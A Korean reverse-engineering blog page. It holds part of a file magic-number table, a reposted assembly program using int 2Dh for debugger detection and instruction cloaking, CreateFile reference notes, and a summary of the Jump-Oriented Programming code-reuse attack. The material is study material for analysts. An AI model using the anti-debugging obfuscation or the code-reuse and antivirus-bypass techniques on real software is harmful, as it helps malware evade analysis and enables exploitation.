RAR WinRAR compressed archive file

52 65 74 75 72 6E 2D 50
61 74 68 3A 20		 Return-P
ath:
EML A commmon file extension for e-mail files.

53 43 48 6C SCHl
AST Need for Speed: Underground Audio file

53 43 4D 49 SCMI
IMG Img Software Set Bitmap

53 48 4F 57 SHOW
SHW Harvard Graphics DOS Ver. 2/x Presentation file

53 49 45 54 52 4F 4E 49
43 53 20 58 52 44 20 53
43 41 4E		 SIETRONI
CS XRD S
CAN
CPI Sietronics CPI XRD document

53 49 54 21 00 SIT!.
SIT StuffIt compressed archive

53 4D 41 52 54 44 52 57 SMARTDRW
SDR SmartDraw Drawing file

53 50 46 49 00 SPFI.
SPF StorageCraft ShadownProtect backup file

53 51 4C 4F 43 4F 4E 56
48 44 00 00 31 2E 30 00		 SQLOCONV
HD..1.0.
CNV DB2 conversion file

53 51 4C 69 74 65 20 66
6F 72 6D 61 74 20 33 00		 SQLite f
ormat 3.
DB SQLite database file

53 5A 20 88 F0 27 33 D1 SZ ˆð'3Ñ
n/a QBASIC SZDD file header variant. (See the SZDD or KWAJ format entries
for additional information.)

53 5A 44 44 88 F0 27 33 SZDDˆð'3
n/a SZDD file format used by DOS COMPRESS.EXE and EXPAND.EXE commands.
This command compresses a single file, replacing the last character in the file name
with an underscore or dollar sign, e.g., FOO.BAZ would be renamed FOO.BA_ or
FOO.BA$. (See the SZDD/KWAJ page for more information.)

53 6D 62 6C Smbl
SYM (Unconfirmed file type. Likely type is Harvard Graphics
Version 2.x graphic symbol or Windows SDK graphic symbol)

53 74 75 66 66 49 74 20
28 63 29 31 39 39 37 2D		 StuffIt 
(c)1997-
SIT StuffIt compressed archive

53 75 70 65 72 43 61 6C
63		 SuperCal
c
CAL SuperCalc worksheet

54 68 69 73 20 69 73 20 This is
INFO UNIX GNU Info Reader File

55 43 45 58 UCEX
UCE Unicode extensions

55 46 41 C6 D2 C1 UFAÆÒÁ
UFA UFA compressed archive

55 46 4F 4F 72 62 69 74 UFOOrbit
DAT UFO Capture v2 map file

56 43 50 43 48 30 VCPCH0
PCH Visual C PreCompiled header file

56 45 52 53 49 4F 4E 20 VERSION
CTL Visual Basic User-defined Control file

56 65 72 73 69 6F 6E 20 Version
MIF MapInfo Interchange Format file

57 4D 4D 50 WMMP
DAT Walkman MP3 container file

57 53 32 30 30 30 WS2000
WS2 WordStar for Windows Ver. 2 document

[29,152 byte offset]
57 69 6E 5A 69 70		 [29,152 byte offset]
WinZip
ZIP WinZip compressed archive

57 6F 72 64 50 72 6F WordPro
LWP Lotus WordPro document.

58 2D X-
EML A commmon file extension for e-mail files. This variant is
for Exchange.

58 43 50 00 XCP.
CAP Cinco NetXRay, Network General Sniffer, and
Network Associates Sniffer capture file

58 50 43 4F 4D 0A 54 79
70 65 4C 69 62		 XPCOM.Ty
peLib
XPT XPCOM type libraries for the XPIDL compiler

58 54 XT..
BDR MS Publisher border

5A 4F 4F 20 ZOO
ZOO ZOO compressed archive

5B 47 65 6E 65 72 61 6C
5D 0D 0A 44 69 73 70 6C
61 79 20 4E 61 6D 65 3D
3C 44 69 73 70 6C 61 79
4E 61 6D 65		 [General
]..Displ
ay Name=
<Display
Name
ECF MS Exchange 2007 extended configuration file

5B 4D 53 56 43 [MSVC
VCW Microsoft Visual C++ Workbench Information File

5B 50 68 6F 6E 65 5D [Phone]
DUN Dial-up networking file

5B 56 45 52 5D or [VER]
5B 76 65 72 5D or [ver]
SAM Lotus AMI Pro document

[2 byte offset]
5B 56 65 72 73 69 6F 6E		 [2 byte offset]
[Version
CIF (Unknown file type)

5B 57 69 6E 64 6F 77 73
20 4C 61 74 69 6E 20		 [Windows
 Latin
CPX Microsoft Code Page Translation file

5B 66 6C 74 73 69 6D 2E
30 5D		 [fltsim.
0]
CFG Flight Simulator Aircraft Configuration file

5F 27 A8 89 _'¨‰
JAR Jar archive

5F 43 41 53 45 5F _CASE_
CAS, CBK EnCase case file (and backup)

60 EA 
ARJ Compressed archive file

62 65 67 69 6E begin
n/a UUencoded files start with a string:
  begin mode path
where mode is the set of permissions as used in
Linux/Unix and path is the name given to the decoded
file. (See this uuencode page for more information.) 

62 70 6C 69 73 74 bplist
plist Binary property list (plist)
(NOTE: Next two bytes are the version number, currently
0x30-30, or "00") 

63 6F 6E 65 63 74 69 78 conectix
VHD Virtual PC Virtual HD image

63 75 73 68 00 00 00 02
00 00 00		 cush....
...
CSH Photoshop Custom Shape

64 00 00 00 d...
P10 Intel PROset/Wireless Profile

64 65 78 0A 30 30 39 00 dex.009.
dex Dalvik executable file (Android)

64 73 77 66 69 6C 65 dswfile
DSW Microsoft Visual Studio workspace file

64 6E 73 2E dns.
AU Audacity audio file

66 49 00 00 fI..
-
SHD Windows NT printer spool file

66 4C 61 43 00 00 00 22 fLaC..."
FLAC Free Lossless Audio Codec file

67 49 00 00 gI..
-
SHD Windows 2000/XP printer spool file

68 49 00 00 hI..
-
SHD Windows Server 2003 printer spool file

6C 33 33 6C l33l
DBB Skype user data file (profile and contacts)

[4 byte offset]
6D 6F 6F 76		 [4 byte offset]
moov
MOV QuickTime movie file

.MOV files have a complicated file signature. The string "moov" is the most common but I have also seen:
  0x66-72-65-65   free
  0x6D-64-61-74   mdat
  0x77-69-64-65   wide

And the following have been reported to me:
  0x70-6E-6F-74   pnot
  0x73-6B-69-70   skip

Furthermore, if you look at byte position xxxxxxxx+4 (where xxxxxxxx is bytes 0-3 of the header), you
will find one (or more!) of these strings repeated; the string "freeseems to be the most common. For
more information, see the QuickTime File Format page. (Thanks to D. Wright for getting me started on this!) 

6F 3C o<
n/a Short Message Service (SMS), or text, message stored on a
Subscriber Identification Module (SIM).

72 65 67 66 regf
DAT Windows NT registry hive file

72 69 66 66 riff
ACD Sonic Foundry Acid Music File (Sony)

72 74 73 70 3A 2F 2F rtsp://
RAM RealMedia metafile

73 6C 68 21 or slh!
73 6C 68 2E slh.
DAT Allegro Generic Packfile Data file (0x21 = compressed,
0x2E = uncompressed)

73 6D 5F sm_
PDB PalmOS SuperMemo file

73 72 63 64 6F 63 69 64
3A		 srcdocid
:
CAL CALS raster bitmap file

73 7A 65 7A szez
PDB PowerBASIC Debugger Symbols file

[60 byte offset]
74 42 4D 50 4B 6E 57 72		 [60 byte offset]
tBMPKnWr
PRC PathWay Map file, used with GPS devices

[257 byte offset]
75 73 74 61 72		 [257 byte offset]
ustar
TAR Tape Archive file (http://www.mkssoftware.com/docs/man4/tar.4.asp)

76 32 30 30 33 2E 31 30
0D 0A 30 0D 0A		 v2003.10
..0..
FLT Qimage filter

78 x
DMG Mac OS X Disk Copy Disk Image file 

7A 62 65 78 zbex
INFO ZoomBrowser Image Index file (ZbThumbnal.info)

7B 0D 0A 6F 20 {..o
LGC, LGD Windows application log

7B 5C 70 77 69 {\pwi
PWI Microsoft Windows Mobile personal note file

7B 5C 72 74 66 31 {\rtf1
RTF Rich text format word processing file
Trailer: 5C 70 61 72 20 7D 7D (\par }})

7E 42 4B 00 ~BK.
PSP Corel Paint Shop Pro image file

7F 45 4C 46 .ELF
n/a Executable and Linking Format executable file (Linux/Unix)

80 .
OBJ Relocatable object code

80 00 00 20 03 12 04 .......
ADX Dreamcast audio file

81 32 84 C1 85 05 D0 11
B2 90 00 AA 00 3C F6 76		 .2„Á….Ð.
²..ª.<öv
WAB Outlook Express address book (Win95)

81 CD AB .Í«
WPF WordPerfect text file

89 50 4E 47 0D 0A 1A 0A ‰PNG....
PNG Portable Network Graphics file
Trailer: 49 45 4E 44 AE 42 60 82 (IEND®B`‚...)

8A 01 09 00 00 00 E1 08
00 00 99 19		 Š.....á.
..™.
AW MS Answer Wizard file

91 33 48 46 ‘3HF
HAP Hamarsoft HAP 3.x compressed archive

95 00 or •.
95 01 •.
SKR PGP secret keyring file

99 
GPG GNU Privacy Guard (GPG) public keyring

99 01 ™.
PKR PGP public keyring file

9C CB CB 8D 13 75 D2 11
91 58 00 C0 4F 79 56 A4		 œËË..UÒ.
‘X.ÀOyV¤
WAB Outlook address file

[512 byte offset]
A0 46 1D F0		 [512 byte offset]
 F.ð
PPT PowerPoint presentation subheader (MS Office)

A1 B2 C3 D4 ¡²ÃÔ
n/a tcpdump (libpcap) capture file (Linux/Unix)

A1 B2 CD 34 ¡²Í4
n/a Extended tcpdump (libpcap) capture file (Linux/Unix)

A9 0D 00 00 00 00 00 00 ©.......
DAT Access Data FTK evidence file

AC 9E BD 8F 00 00 ¬.½...
QDF Quicken data file

AC ED ¬í
n/a Java serialization data (see Object Serialization Stream Protocol)

AC ED 00 05 73 72 00 12
62 67 62 6C 69 74 7A 2E		 ¬í..sr..
bgblitz.
PDB BGBlitz (professional Backgammon software) position database file

B0 4D 46 43 °MFC
PWL Windows 95 password file

B1 68 DE 3A ±hÞ:
DCX Graphics Multipage PCX bitmap file

B4 6E 68 44 ´nhd
TIB Acronis True Image file

B5 A2 B0 B3 B3 B0 A5 B5 µ¢°³³°¥µ
CAL Windows calendar file

BE 00 00 00 AB 00 00 00
00 00 00 00 00		 ¾...«...
....
WRI MS Write file

C3 AB CD AB Ã«Í«
ACS MS Agent Character file

C5 D0 D3 C6 ÅÐÓÆ
EPS Adobe encapsulated PostScript file

C8 00 79 00 È.y.
LBK Jeppesen FliteLog file

CA FE BA BE Êþº¾
CLASS Java bytecode file

CD 20 AA AA 02 00 00 00 Í ªª....
n/a Norton Anti-Virus quarantined virus file

CF 11 E0 A1 B1 1A E1 00 Ï.ࡱ.á.
DOC Perfect Office document
[Note similarity to MS Office header, below]

CF AD 12 FE Ï­.þ
DBX Outlook Express e-mail folder

D0 CF 11 E0 A1 B1 1A E1 ÐÏ.ࡱ.á
DOC, DOT, PPS, PPT, XLA, XLS, WIZ Microsoft Office applications (Word, Powerpoint, Excel, Wizard)
[See also Word, Powerpoint, and Excel "subheaders" at byte offset 512]
[Note the similarity between D0 CF 11 E0 and the word "docfile"!]
AC_ CaseWare Working Papers compressed client file
ADP Access project file
APR Lotus/IBM Approach 97 file
DB MSWorks database file
MSC Microsoft Common Console Document
MSI Microsoft Installer package
MTW Minitab data file
OPT Developer Studio File Workspace Options file
PUB MS Publisher file
RVT Revit Project file
SOU Visual Studio Solution User Options file
SPO SPSS output file
VSD Visio file
WPS MSWorks text document

D2 0A 00 00 Ò...
FTR GN Nettest WinPharoah filter file

D4 2A Ô*
ARL, AUT AOL history (ARL) and typed URL (AUT) files

D4 C3 B2 A1 Ôò¡
n/a WinDump (winpcap) capture file (Windows)

D7 CD C6 9A ×ÍÆš
WMF Windows graphics metafile

DB A5 2D 00 Û¥-.
DOC Word 2.0 file

DC DC ÜÜ
CPL Corel color palette file

DC FE Üþ
EFX eFax file format

E3 10 00 01 00 00 00 00 ã.......
INFO Amiga Icon file

E3 82 85 96 ã‚…–
PWL Windows 98 password file

E4 52 5C 7B 8C D8 A7 4D
AE B1 53 78 D0 29 96 D3		 äR\{ŒØ§M
®±SxÐ)–Ó
ONE Microsoft OneNote note

E8 or è
E9 or é
EB ë
COM, SYS Windows executable file

EB 3C 90 2A ë<.*
IMG GEM Raster file

[512 byte offset]
EC A5 C1 00		 [512 byte offset]
ì¥Á.
DOC Word document subheader (MS Office)

ED AB EE DB í«îÛ
RPM RedHat Package Manager file

EF BB BF ï»¿
n/a Byte-order mark for 8-bit Unicode Transformation Format
(UTF-8) files. (See the Unicode Home Page.)

[At a cluster boundary]
F0 FF FF		 [At a cluster boundary]
ðÿÿ
n/a FAT12 File Allocation Table

[At a cluster boundary]
F8 FF FF FF		 [At a cluster boundary]
øÿÿÿ
n/a FAT16 File Allocation Table

[At a cluster boundary]
F8 FF FF 0F FF FF FF FF		 [At a cluster boundary]
øÿÿ.ÿÿÿÿ
n/a FAT32 File Allocation Table

[512 byte offset]
FD FF FF FF 04		 [512 byte offset]
ýÿÿÿ.
SUO Visual Studio Solution User Options subheader (MS Office)

[512 byte offset]
FD FF FF FF nn 00 00 00		 [512 byte offset]
ýÿÿÿ....
PPT PowerPoint presentation subheader (MS Office)
(where nn has been seen with values 0x0E, 0x1C, and 0x43)

[512 byte offset]
FD FF FF FF nn 00		 [512 byte offset]
ýÿÿÿ..
or
[512 byte offset]
FD FF FF FF nn 02		 [512 byte offset]
ýÿÿÿ..
XLS Excel spreadsheet subheader (MS Office)
(where nn = 0x10, 0x1F, 0x22, 0x23, 0x28, or 0x29)

[512 byte offset]
FD FF FF FF 20 00 00 00		 [512 byte offset]
ýÿÿÿ ...
OPT Developer Studio File Workspace Options subheader (MS Office)
XLS Excel spreadsheet subheader (MS Office)

[512 byte offset]
FD FF FF FF xx xx xx xx
xx xx xx xx 04 00 00 00		 [512 byte offset]
ýÿÿÿ....
........
DB Thumbs.db subheader (MS Office)

FE EF þï
GHO, GHS Symantex Ghost image file

FE FF þÿ
n/a Byte-order mark for 16-bit Unicode Transformation Format/
2-octet Universal Character Set (UTF-16/UCS-2), little-endian files.
(See the Unicode Home Page.)

FF ÿ
SYS Windows executable (SYS) file

FF 00 02 00 04 04 05 54
02 00		 ÿ......T
..
WKS Works for Windows spreadsheet file

FF 46 4F 4E 54 ÿFONT
CPI Windows international code page

FF 4B 45 59 42 20 20 20 ÿKEYB
SYS Keyboard driver file

FF 57 50 43 ÿWPC
WP, WPD, WPG, WPP, WP5, WP6 WordPerfect text and graphics file

FF D8 FF E0 xx xx 4A 46
49 46 00		 ÿØÿà..JF
IF.
JFIF, JPE, JPEG, JPG JPEG/JFIF graphics file
Trailer: FF D9 (ÿÙ)

FF D8 FF E1 xx xx 45 78
69 66 00		 ÿØÿá..Ex
if.
JPG Digital camera JPG using Exchangeable Image File Format (EXIF)
Trailer: FF D9 (ÿÙ)
See "Using Extended File Information (EXIF) File Headers in Digital
Evidence Analysis" (P. Alvarez, IJDE2(3), Winter 2004) and
ExifTool Tag Names

FF D8 FF E8 xx xx 53 50
49 46 46 00		 ÿØÿè..SP
IFF.
JPG Still Picture Interchange File Format (SPIFF)
Trailer: FF D9 (ÿÙ)

NOTES on JPEG file headers: It appears that one can safely say that all JPEG files start with the three hex digits 0xFF-D8-FF.
The fourth digit is also indicative of JPEG content. Various options include:

FF Ex ÿ.
FF Fx ÿ.
MPEG, MPG, MP3 MPEG audio file frame synch pattern

FF FE ÿþ
REG Windows Registry file
n/a Byte-order mark for 16-bit Unicode Transformation Format/
2-octet Universal Character Set (UTF-16/UCS-2), big-endian files.
(See the Unicode Home Page.)

FF FE 00 00 ÿþ..
n/a Byte-order mark for 32-bit Unicode Transformation Format/
4-octet Universal Character Set (UTF-32/UCS-4), little-endian files.
(See the Unicode Home Page.)

FF FE 23 00 6C 00 69 00
6E 00 65 00 20 00 31 00		 ÿþ#.l.i.
n.e. .1.
MOF Windows MSinfo file

FF FF FF FF ÿÿÿÿ
SYS DOS system driver

ACKNOWLEDGEMENTS

The following individuals have given me updates or suggestions for this list over the years: Devon Ackerman, Nazim Aliyev, Vladimir Benko, Arvin Bhatnagar, Sam Brothers, Per Christensson, Cornelis de Groot, Jeffrey Duggan, Peter Almer Frederiksen, George Harpur, Brian High, Eric Huber, Broadus Jones, Axel Kesseler, Nick Khor, Bill Kuhns, Anand Mani, Kevin Mansell, Davyd McColl, Michal, Bruce Modick, Lee Nelson, Dan P., Jorge Paulhiac, Carlo Politi, Stanley Rainey, Cory Redfern, Bruce Robertson, Thomas Rösner, Mike Sutton, Matthias Sweertvaegher, Jason Wallace, Erik van de Burgwal, Franklin Webber, Gavin Williams, Mike Wilkinson, and David Wright. I thank them and apologize if I have missed anyone.

I would like to give particular thanks to Danny Mares of Mares and Company, author of the MaresWare Suite (primarily for the "subheaders" for many of the file types here), and the people at X-Ways Forensics for their permission to incorporate their lists of file signatures.


728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

파이어 폭스의 암호를 획득하기 위해 쓰이는 것  (0) 2012.10.19
프로그램 체크를 통한 안티 리버싱(?)  (0) 2012.10.18
안티리버싱[옛날자료]  (0) 2012.09.03
CreateFile 의 인자값  (0) 2012.06.28
Anti-Reversing Techniques  (0) 2011.12.15

안티리버싱[옛날자료]

리버싱
posted by 블르샤이닝 2012. 9. 3. 16:28
728x90

Int 2Dh debugger detection and code obfuscation - ReWolf^HTB

;

; Date: 14.III.2007

;

;

; I. BACKGROUND

;

;       Possibly new method of debugger detection, and nice way for code

;    obfuscation.

;

;

; II. DESCRIPTION

;

;       Int 2Dh is used by ntoskrnl.exe to play with DebugServices (ref1),

;    but we can use it also in ring3 mode. If we try to use it in normal

;    (not debugged) application, we will get exception. However if we will

;    attach debugger, there will be no exception.

;

;       push    offset _seh     ;\

; push    fs:[0]          ; > set SEH

;       mov     fs:[0], esp     ;/

;

;       int     2dh             ; if debugger attached it will run normally,

;                               ; else we've got exception

;       nop

;       pop     fs:[0]          ;\ clear SEH

;       add     esp, 4          ;/

;

;       ...

;       debugger detected

;       ...

;

;       _seh:

;       debugger not detected

;

;    It can also crash SoftIce DbgMsg driver (ref2).

;

;       Besides this, int 2Dh can also be used as code obfuscation method.

;    With attached debugger, after executing int 2Dh, system skips one byte

;    after int 2Dh:

;

;       int     2dh

;       nop                     ; never executed

;       ...

;

;    If we'll execute step into/step over on int 2Dh different debuggers

;    will behave in different way:

;

;       OllyDbg - run until next breakpoint (if we have any)

;       Visual Studio - stop on instruction after nop in our example

;       WinDbg - stop after int 2dh (always even if we 'Go')

;

;    Only OllyDbg behaves correctly if we permit to run process without any

;    breaks. We can create self debuggable application (as in attached

;    example) that will take advantages of int 2Dh code obfuscation.

;

;

; III. Links

;

;    1. http://www.vsj.co.uk/articles/display.asp?id=265

;    2. http://www.piotrbania.com/all/adv/sice-adv.txt

;

;

; IV. Thanks

;

;    omega red, Gynvael Coldwind, ved, Piotr Bania

;

;

; comments, suggestions, job opportunities: rewolf@poczta.onet.pl

;                                           http://www.rewolf.prv.pl

;---------------------------------------------------------------------------

;

;change file extensionton .asm and compile

;tested on: Win XP Pro sp2 (x86), Win 2k3 server (x64), Vista Ultimate (x64)

;

;---------------------------------------------------------------------------

.386

.model flat, stdcall

option casemap:none

;---------------------------------------------------------------------------

include \masm32\include\windows.inc

include \masm32\include\user32.inc

include \masm32\include\kernel32.inc

includelib \masm32\lib\kernel32

includelib \masm32\lib\user32

;---------------------------------------------------------------------------

.data

procinfo PROCESS_INFORMATION <0>

startinfo STARTUPINFO <0>

debugEvt DEBUG_EVENT<0>

_str db 100 DUP (0)

_fmt db 'eax: %08X',0dh,0ah,'ebx: %08X',0dh,0ah,'ecx: %08X',0dh,0ah,

'edx: %08X',0


;---------------------------------------------------------------------------

;CLOAKxB -> cloaks x bytes instruction


CLOAK1B macro ;int.int

int 2dh

db 0cdh

endm


CLOAK2B macro ;int.ret

int 2dh

db 0c2h

endm


CLOAK3B macro ;int.enter

int 2dh

db 0c8h

endm


CLOAK4B macro ;int.call

int 2dh

db 0e8h

endm


;If you find some other 'cloaking' opcodes i.e. 5 or more bytes please send

;me e-mail ;-)


;---------------------------------------------------------------------------

;sample mov r32, val macro


MOV_REG macro reg1: REQ, val1:REQ, val2:REQ, val3:REQ, val4:REQ

int 2dh

int reg1 ;\

int val3 ; >mov eax, (val1)CD(val3)CD

int val1 ;/

int 2dh

;enter 78xxh, 90h ;  mov al, val4

db 0c8h, reg1 - 8, val4, 90h

int 2dh

;enter 0xxc1h, 10h ;  ror eax, 10h

db 0c8h, 0c1h, reg1 + 10h, 10h

int 2dh

;enter 34xxh, 90h ;  mov al, val2

db 0c8h, reg1 - 8, val2, 90h

int 2dh

;enter 0xxc1h, 10h ;  ror eax, 10h

db 0c8h, 0c1h, reg1 + 10h, 10h

endm

;---------------------------------------------------------------------------

MOV_EAX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ

MOV_REG 0b8h, val1, val2, val3, val4

endm


MOV_EBX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ

MOV_REG 0bbh, val1, val2, val3, val4

endm


MOV_ECX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ

MOV_REG 0b9h, val1, val2, val3, val4

endm


MOV_EDX macro val1:REQ, val2:REQ, val3:REQ, val4:REQ

MOV_REG 0bah, val1, val2, val3, val4

endm

;---------------------------------------------------------------------------

.code

start:



assume fs:nothing

push offset _seh ;\

push fs:[0] ; > set SEH

mov fs:[0], esp ;/


int 2dh ; if debugger attached it will run normally,

; else we've got exception

nop

pop fs:[0] ;\ clear SEH

add esp, 4 ;/


;---------------------------------------------------------------------------


MOV_EAX 98h ,76h, 54h, 32h ; mov eax, 98765432h

MOV_EBX 12h, 34h, 56h, 78h ; mov ebx, 12345678h

MOV_ECX 0abh, 0cdh, 0efh, 0 ; mov ecx, 0abcdef00h

MOV_EDX 90h, 0efh, 0cdh, 0abh ; mov edx, 90efcdabh


;---------------------------------------------------------------------------


CLOAK1B

push edx

CLOAK1B

push ecx

CLOAK1B

push ebx

CLOAK1B

push eax

CLOAK4B

push offset _fmt

CLOAK4B

push offset _str

CLOAK4B

call wsprintf

CLOAK3B

add esp, 18h

CLOAK2B

push 0

CLOAK4B

push offset _str

CLOAK4B

push offset _str

CLOAK2B

push 0

CLOAK4B

call MessageBox

CLOAK2B

push 0

CLOAK2B

jmp _end2

;---------------------------------------------------------------------------

_seh:

; setting mini-debugger ;-)

push offset procinfo

push offset startinfo

push 0

push 0

push DEBUG_PROCESS

push 0

push 0

push 0

call GetCommandLine

push eax

push 0

call CreateProcess


_dbgloop:

push INFINITE

push offset debugEvt

call WaitForDebugEvent


cmp debugEvt.dwDebugEventCode, EXIT_PROCESS_DEBUG_EVENT

je _end


push DBG_CONTINUE

push debugEvt.dwThreadId

push debugEvt.dwProcessId

call ContinueDebugEvent


jmp _dbgloop



_end: push 0

_end2: call ExitProcess

end start

728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

프로그램 체크를 통한 안티 리버싱(?)  (0) 2012.10.18
파일들의 매직넘버  (0) 2012.09.25
CreateFile 의 인자값  (0) 2012.06.28
Anti-Reversing Techniques  (0) 2011.12.15
From ROP to JOP  (0) 2011.12.15

CreateFile 의 인자값

리버싱
posted by 블르샤이닝 2012. 6. 28. 12:59
728x90

아놔 createfile 인자값을 16진수로 된거 찾는데 왜이리 힘들어...ㅡㅡ;;;;기본이지만 알아두어야 좋은점.


CreateFile

ファイル等のオブジェクトを作成またはオープン

Cの宣言
HANDLE CreateFileA(
    LPCTSTR lpFileName,
    DWORD dwDesiredAccess,
    DWORD dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD dwCreationDisposition,
    DWORD dwFlagsAndAttributes,
    HANDLE hTemplateFile
);
HSPの宣言
#func global CreateFile "CreateFileA" sptr,sptr,sptr,sptr,sptr,sptr,sptr
なでしこの宣言
●CreateFile(p1,p2,p3,p4,p5,p6,p7)=DLL("kernel32.dll","HANDLE CreateFileA(
    LPCTSTR lpFileName,
    DWORD dwDesiredAccess,
    DWORD dwShareMode,
    LPSECURITY_ATTRIBUTES lpSecurityAttributes,
    DWORD dwCreationDisposition,
    DWORD dwFlagsAndAttributes,
    HANDLE hTemplateFile
)")
引数
lpFileName
ファイル等のオブジェクト名
dwDesiredAccess
アクセスモード
以下の定数を組み合わせて指定します。

定数意味
--0デバイスへはアクセスせずに属性だけを問い合わせる
GENERIC_READ0x80000000ファイルから読み取りができる
GENERIC_WRITE0x40000000ファイルへの書き込みができる
dwShareMode
他プロセスのアクセス共有モード
以下の定数を組み合わせて指定します。

定数意味
--0共有なし
FILE_SHARE_READ0x00000001他プロセスからの読み取りアクセスを許可
FILE_SHARE_WRITE0x00000002他プロセスからの書き込みアクセスを許可
lpSecurityAttributes
子プロセスにハンドルを継承するかどうかを決めるSECURITY_ATTRIBUTES構造体のポインタを指定。 
継承しない場合はNULLでよい。
dwCreationDisposition
ファイルが存在する場合、しない場合の処理
以下の定数のいずれかを指定します。

定数意味
CREATE_NEW1新しいファイルを作成します。既に存在する場合はエラーとなります。
CREATE_ALWAYS2新しいファイルを作成します。既に存在する場合は上書きします。
OPEN_EXISTING3ファイルをオープンします。ファイルが存在しない場合はエラーとなります。
OPEN_ALWAYS4ファイルをオープンします。ファイルが存在しない場合は新たに作成します。
TRUNCATE_EXISTING5ファイルサイズを0にしてオープンします。
dwDesiredAccessにGENERIC_WRITEが指定されている場合のみ有効。
dwFlagsAndAttributes
ファイル属性とフラグ
以下の定数を組み合わせて指定します。
ただしFILE_ATTRIBUTE_NORMALは単独でのみ有効です。

[属性]
定数意味
FILE_ATTRIBUTE_ARCHIVE0x00000020アーカイブ
FILE_ATTRIBUTE_HIDDEN0x00000002隠しファイル
FILE_ATTRIBUTE_NORMAL0x00000080これといった指定はない。単独でのみ有効。
FILE_ATTRIBUTE_READONLY0x00000001読み取り専用
FILE_ATTRIBUTE_SYSTEM0x00000004システムファイル
FILE_ATTRIBUTE_TEMPORARY0x00000100一時ファイル

[フラグ]
定数意味
FILE_FLAG_WRITE_THROUGH0x80000000キャッシュに貯めず直接ディスクへ書き込む
FILE_FLAG_OVERLAPPED0x40000000オーバーラップ
FILE_FLAG_NO_BUFFERING0x20000000バッファリングせずにファイルをオープンする
FILE_FLAG_RANDOM_ACCESS0x10000000ランダムアクセス
FILE_FLAG_SEQUENTIAL_SCAN0x8000000シーケンシャルアクセス
FILE_FLAG_DELETE_ON_CLOSE0x4000000ハンドルをクローズしたときファイルを削除する
FILE_FLAG_POSIX_SEMANTICS0x1000000POSIX準拠
FILE_FLAG_OPEN_REPARSE_POINT0x200000NTFSの再解析を禁止
hTemplateFile
テンプレートファイルのハンドル。通常は0かNULLでよい。

728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

파일들의 매직넘버  (0) 2012.09.25
안티리버싱[옛날자료]  (0) 2012.09.03
Anti-Reversing Techniques  (0) 2011.12.15
From ROP to JOP  (0) 2011.12.15
How to bypass antivirus with Metasploit  (0) 2011.12.15

매크로 바이러스 관련

리버싱/칼럼
posted by 블르샤이닝 2012. 4. 6. 09:08
728x90


매크로 관련 바이러스에 관한 끄적끄적인거 물론....대표적인 바이러스중 1만 분석한거라 ㅋㅋ 

그래도 이정돌만 알면 매크로 분석의 기본은 할줄알게될거임 ㅋㅋ

글은 많지않으니 정말 부담없을거임~ㅎ

엑셀의 매크로에 대한 내용입니다,


당신의 엑셀은 안전한가요.doc


728x90
저작자표시 비영리 변경금지

'리버싱 > 칼럼' 카테고리의 다른 글

Packing 구조에 대한 이해 - 1부  (0) 2015.03.09
가상화 머신 탐지에 대한 칼럼  (0) 2014.12.01
(칼럼)해킹 사례로 본 사회 시스템 피해  (0) 2014.09.02
(칼럼)윈도우 UAC 우회  (0) 2014.02.13
Java 취약점 분석  (0) 2013.12.02

Anti-Reversing Techniques

리버싱
posted by 블르샤이닝 2011. 12. 15. 14:41
728x90

Athcon.2011-Kyriakos.Economou.ppt

728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

안티리버싱[옛날자료]  (0) 2012.09.03
CreateFile 의 인자값  (0) 2012.06.28
From ROP to JOP  (0) 2011.12.15
How to bypass antivirus with Metasploit  (0) 2011.12.15
detail-analysis-advanced-persistent-threat-malware_33814.pdf  (0) 2011.10.28

From ROP to JOP

리버싱
posted by 블르샤이닝 2011. 12. 15. 14:30
728x90
출처 

Researchers from North Carolina State University and National University of Singapore presented aninteresting paper to ASIACCS11 titled: "Jump-Oriented Programming: A New Class of Code-Reuse Attack".


The previous image (click on it to make bigger), taken from the original paper, shows the differences between the well known Return Oriented Programming and the new Jump Oriented Programming. As in ROP, a jump-oriented program consists of a set of gadget ad- dresses and data values loaded into memory, with the gadget addresses being analogous to opcodes within a new jump- oriented machine. In ROP, this data is stored in the stack, so the stack pointer esp serves as the “program counter” in a return-oriented program. JOP is not limited to using esp to reference its gadget addresses, and control flow is not driven by the ret instruction. Instead, JOP uses a dispatch table to hold gadget addresses and data. The “program counter” is any register that points into the dispatch table. Control flow is driven by a special dispatcher gadget that executes the sequence of gadgets. At each invocation, the dispatcher advances the virtual program counter, and launches the as- sociated gadget.

This new way to see reusable code exploitation makes the use of  three main actors: (1) the dispatcher, which has to hijack the control flow by jumping to different entries on the dispatch table, (2) the dispatch table which has to wrap out gadgets addresses and data/padding, and finally (3) the gadget catalog, which contains the effective code to be executed. Gadgets are not terminating with RET as we were accustomed, but with JMP to the dispatcher. A dispatcher example could be:

add %ecx, 4
jmp %[ecx]

Each time it is executed it jumps to the next gadget  (+4 bytes) through the dispatch table (base address on %ecx).  Each time an addressed gadget is executed it ends with a jump to the dispatcher, in this way a jumping chain is built.  The paper follows on describing a MOC example and providing algorithms to find JOP gadgets. 

I did like this reading and I do suggest it to all the interested security guys that are reading my post,  but I have some issues on believing the real implementation of the dispatcher. As you might see the dispatcher increases the jump offset by a fixed step, this assumes that the respective gadgets don't use data or  at least use a fixed number of data (variables). This is highly impractical in a real exploitation scenario in which the attacker needs many different gadgets which use respectively different quantity of data. I have made here a simple explanation to what I mean.

728x90
저작자표시 비영리 변경금지

'리버싱' 카테고리의 다른 글

CreateFile 의 인자값  (0) 2012.06.28
Anti-Reversing Techniques  (0) 2011.12.15
How to bypass antivirus with Metasploit  (0) 2011.12.15
detail-analysis-advanced-persistent-threat-malware_33814.pdf  (0) 2011.10.28
PEB 구조체를 이용한 간단한 안티디버깅 코드  (0) 2011.10.07

How to bypass antivirus with Metasploit

리버싱
posted by 블르샤이닝 2011. 12. 15. 14:28
728x90

<출처: 

http://resources.infosecinstitute.com/how-to-bypass-antivirus/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+infosecResources+(InfoSec+Resources)&utm_content=Google+Reader

>

